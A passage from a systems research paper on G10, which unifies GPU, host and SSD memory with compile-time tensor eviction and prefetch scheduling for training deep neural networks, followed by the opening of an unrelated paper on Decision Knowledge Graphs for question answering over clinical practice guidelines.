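To make the analyzer's output concrete, the following is a minimal Python sketch (our own illustration, not G10's released implementation) of how per-tensor inactive periods could be derived from a profiled kernel trace; the trace format, field names, and the SSD bandwidth constant are assumptions for the example.

```python
from collections import defaultdict

def find_inactive_periods(kernel_trace, ssd_bw_bytes_per_us=3.2e3):
    """Derive per-tensor inactive periods from an ordered kernel trace.

    kernel_trace: list of dicts, one per kernel in execution order, e.g.
        {"start_us": 0.0, "dur_us": 50.0, "tensors": {"A1": 4 << 20}},
    where "tensors" maps every tensor the kernel reads or writes to its size.
    """
    uses = defaultdict(list)   # tensor name -> [(start_us, end_us), ...] active uses
    sizes = {}
    for k in kernel_trace:
        for name, size in k["tensors"].items():
            uses[name].append((k["start_us"], k["start_us"] + k["dur_us"]))
            sizes[name] = size

    periods = []               # (tensor, gap_start_us, gap_end_us, size_bytes)
    for name, intervals in uses.items():
        for (_, prev_end), (next_start, _) in zip(intervals, intervals[1:]):
            if next_start > prev_end:
                periods.append((name, prev_end, next_start, sizes[name]))

    # A period is a useful eviction candidate only if evicting the tensor to
    # the SSD and prefetching it back both fit inside the gap.
    def hides_swap(period):
        _, start, end, size = period
        round_trip_us = 2 * size / ssd_bw_bytes_per_us
        return (end - start) > round_trip_us

    return [p for p in periods if hides_swap(p)]
```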
With this knowledge, the tensor migration scheduler plans optimized execution schemes for tensors, with the goal of maximally overlapping the GPU computation and tensor migrations. Identifying a globally optimized tensor migration plan is a dynamic optimization problem, as each tensor migration decision will affect subsequent decisions, due to its impact on the GPU memory pressure, and GPU-SSD and GPU-Host bandwidth utilizations. Therefore, we use a dynamic algorithm to iteratively find the best tensor candidates for eviction and prefetching. After that, G10 adds the eviction and prefetch instructions into the compiled program. The GPU executes these instructions at runtime with the unified GPU memory and storage architecture. As the GPU memory, host memory, and SSD are combined into a unified space, the tensor migrations are fully transparent to developers and DNN workloads. We describe each component of G10 as follows. ### Tensor Vitality Analysis **Identifying _global tensors_ and _intermediate tensors_.** We first categorize the tensors based on their lifetimes in a DNN training iteration (i.e., one round of forward and backward propagation). As shown in Figure 6, a _global tensor_ such as a model weight (e.g., W1) is used across multiple training iterations. It will be allocated in the unified memory space at the beginning of the DNN program. An _intermediate tensor_, such as an activation or gradient (e.g., A1 and dA2), is used within one iteration. We define a tensor as _born_ the first time it is used, and as _dead_ after the last time it is used. Intermediate tensors can be deallocated after their deaths to free up GPU memory. **Identifying _tensor inactive time periods_.** When an operator is being executed on the GPU, both its input and output tensors are _active_, and should be present in GPU memory. Otherwise, a tensor is _inactive_ if it is not being used by the currently executing kernel and is not yet dead. We define an _inactive time period_ of a tensor as the period during which the tensor is inactive and not dead (i.e., it is not being used right now but will be used in the future). For a complex DNN program, a tensor may have multiple inactive time periods and can be swapped in and out multiple times (e.g., W1 and A0). Both global and intermediate tensors can be inactive, and the inactive time period of a global tensor may span across two consecutive training iterations. For example, W1 turns inactive during the backward pass of the current iteration, and it becomes active again in the forward pass of the next iteration. The inactive time periods of all tensors indicate when a tensor is safe to be migrated out and when it must be migrated back. As DNN programs have predictable performance and dataflow patterns, G10 performs offline compile-time profiling, and uses the execution times of the GPU kernels to estimate the lengths of the inactive time periods. Using the tensor sizes, the storage bandwidth, and the GPU-Host bandwidth, G10 estimates the eviction and prefetch overheads of each tensor. G10 then leverages all the inactive time periods to generate a globally optimized execution plan. ### Smart Tensor Eviction To generate a globally optimized migration plan, the smart tensor eviction algorithm must address the following challenges. First, we must utilize the limited GPU on-board memory to store the most beneficial tensors. As tensors have different sizes and inactive period lengths, they contribute different degrees of GPU memory pressure. 
Thus, evicting some tensors (e.g., large tensors with long inactive periods) yields more benefits in reducing GPU memory pressure. Second, we must consider both SSD and host memory as potential migration destinations, as they provide different bandwidths, capacities, and different migration overheads. Ideally, we aim to exploit both the high migration bandwidth of host memory and the large capacity of the SSD. Third, we should best utilize the available migration bandwidth, as DNN workloads are mostly bandwidth-sensitive. The algorithm should also choose the best timings for tensor migrations. Figure 5. System architecture of G10. To this end, we propose a smart eviction scheduling algorithm that iteratively finds the best eviction candidates (i.e., tensor inactive periods) in each training iteration at compile time. The algorithm tracks the GPU memory consumption and the migration bandwidth utilization to evaluate potential benefits of an eviction. We describe its key ideas as follows.

```
Algorithm 1: Smart tensor eviction scheduling in G10
Input:  gpu_cap  = the GPU on-board memory capacity
        tensors  = the list of all intermediate tensors
        periods  = the list of all tensor inactive periods
Output: A list of G10 tensor migration instructions

 1  Function EvictionScheduling(gpu_cap, tensors, periods):
 2      for i = 0; i < periods.size; i++ do
 3          if max(mem_pressure) < gpu_cap then break
 4          sort periods by critical_mem_pressure_reduction
 5          if periods[0].critical_mem_pressure_reduction > 0 then
 6              t_r <- periods[0].start_time
 7              t_s <- periods[0].tensor_size / BW_SSD
 8              if to_ssd_traffic is full during t_r to t_r + t_s then
 9                  if host memory isn't full during periods[0] then
10                      schedule pre-eviction(periods[0].tensor, host) at t_r
11                      periods.erase(0)
12                  end if
13                  update memory pressure and I/O traffic
14                  continue
15              end if
16              schedule pre-eviction(periods[0].tensor, SSD) at t_r
17              update memory pressure and I/O traffic
18              periods.erase(0)
19          end if
20      end for
```

In G10, we always attempt to evict tensors to the SSD first, due to its large capacity. In contrast, host memory only offers a limited memory capacity, and thus naively evicting to host memory quickly uses up its capacity and eventually falls back to evicting to the SSD anyway. However, in some cases, we still want to leverage the valuable host memory for our tensor migration. Compared to the SSD, the host DRAM offers much higher access bandwidth. Thus, we only evict a tensor to host memory when the SSD traffic is under high pressure, as shown in lines 7-17 of Algorithm 1. In this way, G10 exploits the large SSD capacity when its bandwidth is sufficient, and utilizes the high migration bandwidth of GPU-Host when the SSD bandwidth is saturated. **Smart Tensor Eviction Scheduling.** We describe the end-to-end procedure of G10's smart tensor eviction scheduling algorithm in Algorithm 1. To generate an optimized migration plan, it iteratively searches for the best eviction candidate, until the GPU memory pressure is below the capacity limit or there are no more beneficial eviction candidates. The algorithm tracks the three global states throughout the search process: (1) a set of inactive periods, (2) the estimated memory pressure versus time, and (3) the estimated bandwidth utilizations. 
In each iteration of the algorithm, it selects one eviction candidate, chooses where to evict this tensor as described above, and updates the three states accordingly. ### Smart Tensor Prefetching To maximize memory pressure suppression, the smart tensor eviction algorithm assumes the prefetch to be performed at the latest time that does not cause data idleness, which is defined as the _latest safe prefetch time_. However, to ensure that each prefetch completes exactly before the respective tensor turns active, the algorithm needs a perfect estimation of inactive period lengths and I/O traffic status. Thus, inaccurate estimation of inactive period length or I/O traffic status will incur stalls under this default prefetch policy. Our insight is that for most DNN programs, the GPU memory pressure is under the capacity limit after scheduling the evictions. As shown in Figure 8, the GPU memory pressure, presented as the black curve, is under the GPU capacity over time. The naive prefetch policy does not fully utilize the remaining GPU memory. Based on our insight, G10 applies a smart prefetching algorithm that prefetches evicted inactive tensors eagerly to further tolerate imperfect migration decisions. G10 sorts all the evicted tensor inactive periods in the order of their _latest safe prefetch time_. G10 then traverses all evicted tensor inactive periods in order and reschedules their prefetches earlier if possible. Figure 8 shows an example. For one evicted inactive period \(i\) with the latest safe prefetch time \(t_{i}\), the algorithm searches backward from time \(t_{i}\) until reaching the earliest time \(t^{\prime}_{i}\) at which the GPU can hold the entire tensor safely with the available space. In other words, the algorithm selects a time \(t^{\prime}_{i}\) at which placing this tensor on the GPU will not exceed the GPU memory capacity. Therefore, the algorithm schedules the prefetch for this tensor at \(t^{\prime}_{i}\), and the GPU memory pressure curve between time \(t^{\prime}_{i}\) and \(t_{i}\) is updated. If there is no such optimization opportunity, the prefetch instruction will still be scheduled at time \(t_{i}\). **Code Instrumentation.** To enable smart data migration, G10 utilizes deep learning compilers to automatically insert the following instructions into the generated GPU program: (1) g10_prefetch(vaddr, size), which fetches a tensor into GPU memory; (2) g10_pre_evict(vaddr, size, target_loc), which evicts a tensor from GPU memory to the SSD or host memory; (3) g10_alloc(**xptr, size), which allocates a buffer on the GPU memory asynchronously; (4) g10_free(**xptr), which frees the buffer asynchronously. We show an example of an instrumented GPU program in Figure 9. We will further discuss these instructions in §4.6. ### Unified GPU Memory and Storage The diversified memory and storage hierarchy (i.e., GPU memory, host memory, and SSD) inevitably increases the complexity of GPU memory management, and makes it challenging for G10 to track the memory locations of each tensor. To address this challenge, we develop a unified memory space. Therefore, G10 can plan the tensor migration schemes using virtual addresses; the runtime system relies on the unified virtual memory to conduct the address translation and identify the physical locations of tensors transparently. Prior studies (Han et al., 2017; Wang et al., 2018) proposed the unified address translation for memory-mapped SSDs, which combines the address mapping of SSDs into the page table of the virtual memory. 
Therefore, the page table entries can directly point to the physical flash addresses. Although GPUs provide unified virtual memory (UVM) to manage the host memory and GPU memory in a unified space (Han et al., 2017; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018), current GPU UVM does not support flash memory. G10 integrates the GPU memory, host memory, and flash memory into a unified memory space for enabling transparent tensor migrations. Figure 8. An example of scheduling the prefetch time for one evicted inactive tensor. Figure 9. An example of an instrumented GPU program. With unified memory, all tensors are managed at the regular 4KB page granularity. For the tensors whose size is less than 4KB, G10 will compact them into a page to minimize the memory fragmentation across different memory types. As the GPU and host interact with the SSD at the regular page granularity, the I/O amplification of the SSD will not be worse than that of commodity SSDs. With the UVM extension, G10 has a unified address translation layer in the memory manager, where the flash address mappings in the flash translation layer have been integrated into the page table of the GPU UVM. In this case, the page table entry (PTE) will point to an address in host memory, GPU memory, or flash memory. G10 allows the SSD controller to update the page table entries (PTEs) when garbage collection (GC) of the SSD moves valid flash pages to a new flash block. G10 relies on the existing UVM support to maintain the consistency of the host-side unified page table and GPU-side local page table, as well as the TLBs. As G10 migrates tensors among GPU memory, host memory, and SSD at page granularity, the corresponding PTEs and TLBs will also be updated with the new page address. Since the PTE and its corresponding TLB are always updated, the unified memory system handles address translations and paging to load data from the SSD or host memory to the GPU memory. The UVM extension simplifies the programmability and enables transparent tensor migration. Its page fault handling mechanism may incur extra performance overhead. However, the smart tensor migration mechanism in G10 minimizes unexpected page faults and data migrations, which makes the UVM extension an appealing feature (see Figure 11). ### Tensor Migration with Extended UVM G10 supports smart tensor migration with the extended UVM (§4.5). It extends the device UVM driver to implement the smart migration handler on the host. We show the workflow of tensor migration in Figure 10. Upon executing g10_pre_evict(vaddr, size, target_loc), the CUDA runtime will send an exception to the migration handler on the host side. The migration handler will initiate the migration of the corresponding tensor, and migrate the tensor to the specified location target_loc via the DMA engine. Note that G10 will rely on the unified memory system for the address translation of vaddr, and use size to decide how many pages it will migrate. Upon executing g10_prefetch(vaddr, size), the tensor migration handler will access the unified memory with vaddr. It will initiate the prefetching process and request the GPU DMA engine to fetch the tensor from the host memory or SSD. As shown in Figure 10, for tensor evictions and prefetching, G10 will rely on the unified page table to identify the physical locations of tensors. For pre-evictions, G10 will look up the GPU page to be evicted. After that, the migration metadata will be stored in the corresponding Migration Metadata Queues. 
The Migration Arbiter will select several page migrations to form the next migration batch and store them in the Transfer Sets. During this procedure, the G10 driver will also communicate with the GPU to allocate GPU memory on demand. The migrations in the Transfer Sets will be batched periodically; the corresponding SSD-GPU data transfers will be handled by the Direct Storage Access (DSA) process, and CPU-GPU data transfers will be handled by the DMA process. After the data migrations, the unified page table and corresponding TLB entries will be updated. G10 fully utilizes the GPU-Host bandwidth and storage bandwidth with data batching. The Migration Arbiter applies different priorities to different migration queues (e.g., page faults have the highest priority). G10 will calculate the number of migrations to batch in the next round to fully saturate the bandwidth. ## 5. Implementation Details **Tensor vitality analyzer.** The tensor vitality analyzer is a static analysis tool, which is compatible with the deep learning compiler PyTorch. The analyzer takes a DNN model and the profiled execution time of each kernel as inputs. After the static analysis (§4.2), it generates instrumented CUDA programs. We feed the instrumented program into the simulator framework (see below) to simulate the entire G10 system. **Simulator framework.** To efficiently simulate the executions of diverse DNN models, we first run these real models on a real A100 GPU and trace the execution of all kernels. We build a simulation framework based on UVMSmart (Wang et al., 2017) and GPGPU-Sim (Wang et al., 2018) to simulate the UVM, including the GPU page fault handling, data migration, and address translation. Our simulator supports taking the execution traces as input, so it can replay the kernel traces. We believe our simulation framework reasonably models the actual execution of DNN models, especially considering it replays real kernel traces collected on a real GPU. We focus on the address translation and coherency support for the unified page tables. We modeled the latency overheads caused by the host page fault handler, the interaction between the GPU and CPU for the page fault handler, and page table walks, inside our timing model for accurate measurements. When incorporating the SSD into the UVM system, we follow the approach described in prior studies (Beng et al., 2018). We rely on the host page fault handling mechanism to do the address translation. Upon access to pages that do not reside in GPU memory, the GPU page fault handler will raise an interrupt to the host, and the host is responsible for moving data. To simulate the SSD internals and capture their activities, such as garbage collection (GC) and flash chip accesses, in our evaluation, we developed an SSD simulator based on SSDSim (Chen et al., 2018) and integrated it into our simulator framework. Therefore, as we measure the overall system performance during the experiments, the internal SSD activities are considered. Figure 10. The workflow of runtime migrations in G10. ## 6. Discussion and Future Work **Multi-GPU support**. G10 can easily be extended to effectively support multiple GPUs for three reasons. First, as multiple GPUs share SSDs, and each GPU can run independently, we can deploy the smart tensor migration mechanism of G10 on each GPU. Therefore, each GPU will make its own decisions on the tensor migrations. Second, current UVM already supports multiple GPUs, creating a unified memory space across the host memory and all GPUs' memory. 
The UVM extension of G10 supports multiple GPUs by integrating the shared flash memory space into the existing UVM as discussed in §4.5. Third, as we increase the number of GPUs, we may want to increase the number of SSDs to increase the aggregate storage bandwidth. Since the SSD array (e.g., using RAID) is shared by multiple GPUs, G10 will treat the SSD array as a shared flash memory space and integrate it into the UVM. Our evaluation (§7.5) conducts a sensitivity analysis as we increase the number of SSDs. We wish to explore multi-GPU support further as future work. ## 7. Evaluation We show that (1) G10 outperforms state-of-the-art designs by up to 1.75\(\times\) for training large DNN models that exceed GPU on-board memory capacity (§7.2); (2) G10 supports larger batch sizes with better performance than other designs (§7.3); (3) G10 saves host memory capacity with negligible performance degradation (§7.4); (4) G10 improves DNN training performance with different hardware settings (§7.5); (5) G10's scheduling algorithm is resilient against profiling errors (§7.6); (6) G10 has negligible negative impact on the SSD lifetime (§7.7). ### Experimental Setup We evaluate G10 with the diverse DNN models in Table 1, including transformer-based models (BERT and ViT) and CNNs (ResNet, Inceptionv3, and SENet). The models are retrieved from PyTorch examples (Zhu et al., 2017) and the Hugging Face public repositories (Zhu et al., 2017), and the training datasets include CoLA (Zhu et al., 2017) and ImageNet (Wang et al., 2018). We use the FP32 format for the tensor representation. We vary the batch size for each model to study the impact of different memory demands. **System configuration.** Table 2 shows the hardware configuration of our experimental testbed. We set the SSD parameters based on the Samsung Z-NAND SSD (Wang et al., 2018). The host memory, GPU, and SSD are connected with a PCIe interconnect that can deliver a bandwidth of 15.754 GB/s bidirectionally. We model the UVM system following prior works (Zhu et al., 2017; Wang et al., 2018). We compare G10 with several state-of-the-art GPU memory-expanding solutions: DeepUM+ (Wang et al., 2018) and FlashNeuron (Liu et al., 2019). We also evaluate G10 with different host memory capacities. As hardware capabilities evolve over time, we conduct a sensitivity analysis with different SSD bandwidths. To summarize, we compare G10 against the following baseline designs: * **Ideal**: a GPU with infinite on-board memory, which gives the theoretically best performance. * **Base UVM**: the basic GPU-CPU-SSD UVM system with only on-demand page migrations via page faults. * **DeepUM+**: a UVM system using a correlation-based prefetcher to prefetch data to the GPU memory. We extend the original GPU-CPU-based DeepUM design (Wang et al., 2018) to support SSDs. Upon a GPU page eviction, if the CPU memory is full, DeepUM+ can still evict the page to the SSD. * **FlashNeuron** (Liu et al., 2019): a DNN training library using direct GPU-SSD communication to selectively swap intermediate tensors (instead of all tensors) to the SSD. Since FlashNeuron works in a traditional non-UVM style, we used FlashNeuron's memory manager for a fair comparison. 
\begin{table} \begin{tabular}{|l|l|l|l|} \hline **Model** & **\# Kernels** & **Source** & **Dataset** \\ \hline BERT (He et al., 2017) & 1368 & Hugging Face & CoLA \\ \hline ViT (He et al., 2017) & 1435 & Hugging Face & ImageNet \\ \hline Inceptionv3 (Wang et al., 2018) & 740 & PyTorch Examples & ImageNet \\ \hline ResNet152 (Wang et al., 2018) & 1298 & PyTorch Examples & ImageNet \\ \hline SENet154 (Wang et al., 2018) & 2318 & PyTorch Examples & ImageNet \\ \hline \end{tabular} \end{table} Table 1. Evaluated DNN models and datasets. Figure 11. DNN training throughput normalized to the ideal performance. **b** is batch size. **M** is the total memory consumption of the DNN w.r.t. GPU memory capacity. \begin{table} \begin{tabular}{|l|l|} \hline **CPU Main Memory** & 128GB DDR4 \\ \hline **GPU** & NVIDIA A100 \\ \hline **GPU Memory** & 40GB HBM2e \\ \hline **Page Size** & 4KB \\ \hline **SSD Read/Write Bandwidth** & 3.2/3.0 GB/s \\ \hline **SSD Read/Write Latency** & 20/16 \(\mu\)s \\ \hline **SSD Capacity** & 3.2 TB \\ \hline **Interconnect** & PCIe Gen3 x16 \\ \hline **GPU Page Fault Handling Latency** & 45 \(\mu\)s \\ \hline \end{tabular} \end{table} Table 2. System Configuration. Figure 12. Execution time breakdown of training (left to right: Base UVM, FlashNeuron, DeepUM+, G10). ### End-to-end Performance We show the end-to-end DNN training throughput of different benchmarks in Figure 11. On average, G10 outperforms FlashNeuron by 1.56\(\times\) and DeepUM+ by 1.31\(\times\). Compared to the ideal system with infinite GPU memory, G10 unleashes 90.3% of the ideal performance using limited GPU memory. Footnote 11: FlashNeuron fails to execute the ViT and Inceptionv3 models when their batch size is large, as the GPU memory cannot host all the tensors required for a kernel execution, due to the limited GPU memory capacity. **DNN training throughput.** As shown in Figure 11, Base UVM performs 4.55\(\times\) worse than the ideal, due to the significant page fault overhead. With heuristic-based tensor eviction and prefetching, FlashNeuron and DeepUM+ improve the performance over Base UVM by 2.46\(\times\) and 3.12\(\times\), respectively. However, both of them are still much slower than the ideal performance. Although DeepUM+ supports DNN models with large memory demands, its correlation-based prefetching mechanism cannot capture rich DNN semantics. G10 outperforms FlashNeuron and DeepUM+ by up to 1.75\(\times\), which demonstrates the effectiveness of the smart tensor migration algorithm in capturing DNN semantics. For most benchmarks, G10 achieves nearly ideal performance by exploiting the deterministic dataflow of DNN workloads and best utilizing the limited I/O bandwidth. The only exception is ViT, which has a high migration I/O bandwidth demand when the batch size is large. To further understand the benefits of G10, we gradually enable the features of G10. Therefore, we have (1) **G10-GDS**, which only supports tensor migrations between GPU and SSD; (2) **G10-Host**, which enables tensor migrations among GPU, host, and SSD; and (3) **G10**, which extends **G10-Host** with the UVM extension that unifies the GPU memory, host memory, and SSD (§4.5). As shown in Figure 11, G10-GDS outperforms existing solutions for most DNN workloads, because of its smart tensor migrations. G10-Host further improves the performance as it utilizes the host memory. For the ResNet152 workload, G10-GDS does not perform better than DeepUM+, because G10-GDS can only migrate tensors between GPU and SSD. 
However, by enabling tensor migrations between GPU and host, G10-Host outperforms DeepUM+ by 1.23\(\times\). With the UVM extension enabled, G10 further improves the performance, due to the reduced software overhead of accessing flash pages and handling page faults. **Execution time breakdown.** The performance benefit of G10 comes from the better overlapping between computation and memory swapping. Figure 12 shows the percentage of time during which tensor migrations perfectly overlap with GPU computation, and the percentage of time when tensor migrations stall GPU computation. Compared to all other designs, G10 has the least stall time, since it generates a better swapping schedule than other designs. Figure 13 further shows how many kernels are stalled by tensor swapping. For Base UVM, more than half of the kernels (truncated in the figure) suffer page fault overhead. FlashNeuron and DeepUM+ reduce the number of affected kernels, but both designs still cause significant slowdown to many kernels (4%-30% of kernels). With G10, only 1%-6% of kernels perform worse than the ideal case. **Tensor migration traffic.** To understand how G10 utilizes the available I/O bandwidth, we show the total migration traffic of GPU-SSD and GPU-Host in Figure 14. Due to the inefficiency of heuristic-based migration policies (e.g., LRU policy and linear selection (12)), Base UVM and DeepUM+ schedule more tensor evictions than necessary. On the contrary, FlashNeuron does not schedule a sufficient number of evictions as it does not swap weight tensors, so it cannot reserve enough space for future tensors in a timely manner. We also observe that a small amount of host memory plays a critical role for G10 to tolerate tensors that have high migration bandwidth demands. Particularly, transformer models (BERT and ViT) are more bandwidth-intensive, so G10 directs most of their migration traffic to the host memory. CNN models are more compute-intensive; thus, the SSD bandwidth can sustain more than half of the migration traffic. By fully utilizing the available bandwidth, G10 unleashes the potential of the GPU-CPU-SSD unified memory. Figure 14. Tensor migration traffic breakdown. Figure 13. Distribution of kernel execution time slowdown normalized to ideal performance (lower is better). ### Performance with Varying Batch Size As batch size varies, the performance of G10 is always the closest to ideal among all the designs. In Figure 15, while most designs achieve the ideal performance when the batch sizes are small and the memory demand is low, G10 can tolerate larger batch sizes and higher memory demands. With larger batch sizes, more tensors must be swapped with the limited I/O bandwidth. Thus, it is more crucial to make smart migration decisions to hide the migration latency and avoid stalling future kernels. Despite significantly outperforming Base UVM, DeepUM+ and FlashNeuron quickly fall behind the ideal performance as batch size increases, due to their sub-optimal swapping policies. G10 still delivers the required data to the active kernels in time under strict capacity and bandwidth limitations in most cases, thanks to its intelligent tensor migrations. In general, G10 outperforms FlashNeuron and DeepUM+ by up to 2.67\(\times\) and 1.45\(\times\), respectively. As batch size continues to increase, the performance of all designs eventually degrades, but G10 still outperforms all other designs. 
If the total memory consumption of the current and the next kernel exceeds GPU memory capacity, data required by the next kernel cannot be ready in the GPU before the kernel starts. Thus, the next kernel inevitably stalls due to poor overlapping between computation and data transfer. ### Impact of Varying Host Memory Capacity While using the cost-efficient SSD to expand GPU memory capacity, G10 also leverages the host memory bandwidth to compensate for tensors that cannot be swapped into and back from the SSD within their inactive periods. Since most tensors do not require high migration bandwidth (Figure 4), G10 only needs a small amount of host memory to tolerate them. Figure 16 shows G10's performance with different host memory capacities. For most DNN models with small batch sizes, 32GB of host memory is sufficient for G10 to fully utilize the migration bandwidth between the host and GPU. The host memory capacity demand grows linearly with the batch size, as the sizes of the migrated tensors grow linearly. As we vary the host memory capacity, we also compare G10 with DeepUM+ and FlashNeuron. We use two representative models: ViT (transformer) with a batch size of 1024 and Inceptionv3 (CNN) with a batch size of 1280. We show the results in Figure 17. When there is no host memory, G10 outperforms DeepUM+ and FlashNeuron by 2.58\(\times\) and 1.04\(\times\) on average, respectively. This is because DeepUM+ relies on conventional GPU UVM and incurs a significant number of page faults. As we increase the host memory capacity, the performance of DeepUM+ is improved; however, it still performs 1.26\(\times\) worse than G10. As FlashNeuron fully relies on GPUDirect Storage and does not use host memory, its performance is barely affected as we vary the host memory capacity. Because of smart data migrations, G10 always performs better than FlashNeuron (1.33\(\times\) on average). ### Impact of Varying SSD Bandwidth We now examine G10 with different SSD bandwidths (e.g., stacking multiple SSDs or using a higher-end SSD). For increased bandwidths, we assume the interconnect is PCIe 4.0 x16 (32 GB/s). In Figure 18, G10 outperforms all other designs regardless of the SSD bandwidth. For all benchmarks, 1 to 4 SSDs (up to 12.8 GB/s) are sufficient for G10 to achieve 90% to 100% of the ideal performance. BERT and ViT fail to attain the ideal performance because they are bottlenecked by the interconnect bandwidth (i.e., always swapping to host still cannot satisfy the bandwidth requirement). G10 exploits the high migration bandwidth of the host memory while best utilizing the SSD to reduce host memory pressure (§7.4). In contrast, even with enough SSDs to saturate the interconnect bandwidth, FlashNeuron and DeepUM+ still only achieve 70%-80% of ideal performance for BERT and ViT. Figure 16. Execution time as we vary the host memory capacity. Figure 17. Performance comparison of G10, DeepUM+, and FlashNeuron with different host memory capacities. Figure 15. Training throughput with varying batch sizes. ### Impact of Profiling Errors To understand the robustness of G10's scheduling algorithm against profiling errors, we add random noise to the execution time of each kernel in our simulator. Figure 19 shows the performance of G10 with various degrees of profiling errors. For all benchmarks, the performance degradation is under 0.5% even when the profiling error is \(\pm\)20%. The profiling errors only affect the estimation of tensor inactive period lengths. 
G10 tolerates such errors by eagerly prefetching a tensor before it is used (§4.4). In most cases, the early prefetch can tolerate the profiling inaccuracy. ### Impact on SSD Lifetime As reported in the released datasheet of the Samsung Z-SSD SZ985 (Samsung, 2018), its device endurance is 30 Drive Writes Per Day (DWPD) for five years. According to our study, DNN workloads incur almost 50% writes and 50% reads. In this case, the SSD lifetime under G10 would be 30 DWPD \(\times\) 1825 days (5 years) \(\times\) 3.2 TB / (3 GB/s) \(\times\) 2 \(\approx\) 3.7 years of continuous use (i.e., the total endurance in bytes divided by the write bandwidth, doubled because only half of the traffic is writes). Considering DNN workloads are data intensive and a commodity SSD usually lasts 3-5 years, the impact on SSD lifetime is not much of a concern. Based on Figure 14, we further break down the traffic into reads and writes. G10 incurs 1.37\(\times\) and 2.20\(\times\) fewer writes than DeepUM+ and FlashNeuron, respectively. As SSD lifetime is affected by the write traffic, G10 can achieve a longer lifetime than state-of-the-art solutions. ## 8. Related Work **GPU memory wall**. DNN workloads make heavy use of GPUs. They rely on GPU memory and host memory to host their working sets. However, due to the limited capacity, they cannot host large models (Beng et al., 2016; Wang et al., 2017; Wang et al., 2018; Wang et al., 2019; Wang et al., 2020). An alternative approach is to bring flash closer to GPUs, such as GPUDirect Storage (Wang et al., 2018), ZnG (Wang et al., 2018; Wang et al., 2020), and AMD's SSG (Wang et al., 2019; Wang et al., 2020). ZnG replaced GPU memory with flash chips and hard-coded the flash addresses in the GPU MMU (Wang et al., 2020). SSG and GPUDirect Storage enable the GPU to directly communicate with SSDs via the PCIe interface (Wang et al., 2018). Unfortunately, their performance is bottlenecked by the PCIe bandwidth. In this paper, we develop a unified GPU memory system, and best utilize tensor behaviors to overcome the bottlenecks of slow memories. **New memory technologies.** To overcome the memory scaling wall, researchers have mostly focused on developing scalable memory technologies (Wang et al., 2018; Wang et al., 2019; Wang et al., 2020). For instance, HBM (Chen et al., 2018; Wang et al., 2020) was produced to meet the bandwidth requirement of accelerators, but its capacity is still limited. Intel released its Optane persistent memory (Han et al., 2018), and Samsung released its ultra-low latency SSDs (Wang et al., 2019). G10 is compatible with new and emerging memory and storage devices; it leverages low-cost memories to scale the GPU memory while reaching near-ideal performance. **Unified memory and storage**. Prior studies showed that SSDs can be used as memory via a memory-mapped interface (Chen et al., 2018; Wang et al., 2018; Wang et al., 2019; Wang et al., 2020; Wang et al., 2020; Wang et al., 2020; Wang et al., 2020). However, they were designed for CPU-centric computing and cannot be directly applied to GPUs. NVIDIA and AMD have been supporting UVM in their GPU products by enabling unified memory between the host and GPU (Wang et al., 2019; Wang et al., 2020). G10 advances the architecture and integrates flash memories into the unified memory space. To optimize data movements between the host and GPU memory, prior studies (Wang et al., 2018; Wang et al., 2019; Wang et al., 2020; Wang et al., 2020; Wang et al., 2020) explored data localities of DNN workloads. G10 shares the same purpose with them. 
However, different from studies like the ZeRO series (Wang et al., 2018; Wang et al., 2020; Wang et al., 2020) that offload tensors at a coarse (DNN layer) granularity, G10 enables tensor migrations at page granularity, and develops an active-time-aware tensor migration scheme. ## 9. Conclusion We present G10, a unified GPU memory and storage architecture for scaling deep learning workloads. G10 is driven by our observation that the predictable tensor behaviors offer sufficient opportunities for G10 to make smart data migrations. Thus, we can overlap the GPU computation and flash accesses. With diverse DNN training workloads, we show that G10 can achieve near-ideal performance. ###### Acknowledgements. We thank the anonymous reviewers for their insightful comments and feedback. This work was partially supported by NSF grant CCF-2107470, NSF CAREER Award CNS-2144796, and a grant from the Defense Advanced Research Projects Agency (DARPA) under the award number HR00112390029. The views, opinions and/or findings expressed are those of the author and should not be interpreted as representing the official views or policies of the Department of Defense or the U.S. Government. Figure 19. Performance of G10 under various degrees of kernel timing prediction errors (normalized to no error). Figure 18. Performance with varying SSD bandwidth (normalized to ideal).
2308.02984
Decision Knowledge Graphs: Construction of and Usage in Question Answering for Clinical Practice Guidelines
In the medical domain, several disease treatment procedures have been documented properly as a set of instructions known as Clinical Practice Guidelines (CPGs). CPGs have been developed over the years on the basis of past treatments, and are updated frequently. A doctor treating a particular patient can use these CPGs to know how past patients with similar conditions were treated successfully and can find the recommended treatment procedure. In this paper, we present a Decision Knowledge Graph (DKG) representation to store CPGs and to perform question-answering on CPGs. CPGs are very complex and no existing representation is suitable to perform question-answering and searching tasks on CPGs. As a result, doctors and practitioners have to manually wade through the guidelines, which is inefficient. Representation of CPGs is challenging mainly due to frequent updates on CPGs and decision-based structure. Our proposed DKG has a decision dimension added to a Knowledge Graph (KG) structure, purported to take care of decision based behavior of CPGs. Using this DKG has shown 40\% increase in accuracy compared to fine-tuned BioBert model in performing question-answering on CPGs. To the best of our knowledge, ours is the first attempt at creating DKGs and using them for representing CPGs.
Vasudhan Varma Kandula, Pushpak Bhattacharyya
2023-08-06T01:38:40Z
http://arxiv.org/abs/2308.02984v1
Decision Knowledge Graphs: Construction of and Usage in Question Answering for Clinical Practice Guidelines ###### Abstract In the medical domain, several disease treatment procedures have been documented properly as a set of instructions known as Clinical Practice Guidelines (CPGs). CPGs have been developed over the years on the basis of past treatments, and are updated frequently. A doctor treating a particular patient can use these CPGs to know how past patients with similar conditions were treated successfully and can find the recommended treatment procedure. In this paper, we present a Decision Knowledge Graph (DKG) representation to store CPGs and to perform question-answering on CPGs. CPGs are very complex and no existing representation is suitable to perform question-answering and searching tasks on CPGs. As a result, doctors and practitioners have to manually wade through the guidelines, which is inefficient. Representation of CPGs is challenging mainly due to frequent updates on CPGs and decision-based structure. Our proposed DKG has a decision dimension added to a Knowledge Graph (KG) structure, purported to take care of decision based behavior of CPGs. Using this DKG has shown 40% increase in accuracy compared to fine-tuned BioBert model in performing question-answering on CPGs. To the best of our knowledge, ours is the first attempt at creating DKGs and using them for representing CPGs. ## 1 Introduction Clinical Practice Guidelines (CPGs) are a set of systematically developed statements intended to assist a doctor or a practitioner to make decisions about appropriate health care to be given to a patient under a specific clinical circumstance. CPGs are built based on evidence from past treatments including the patient's symptoms, conditions over time, and what decisions led to successful treatment. CPGs can change the process of treatment, and outcome of care, improve the quality of care and enable efficient use of resources. Since CPGs are large documents, a lot of time will be taken to manually search CPGs. There is no existing suitable representation for CPGs to perform tasks like searching, navigating, and question-answering. As a result, doctors and practitioners have to manually refer to the guidelines. Our **motivation** is as follows: According to American Hospital Association (aha), in 2022, there were more than 33 million admissions of patients in 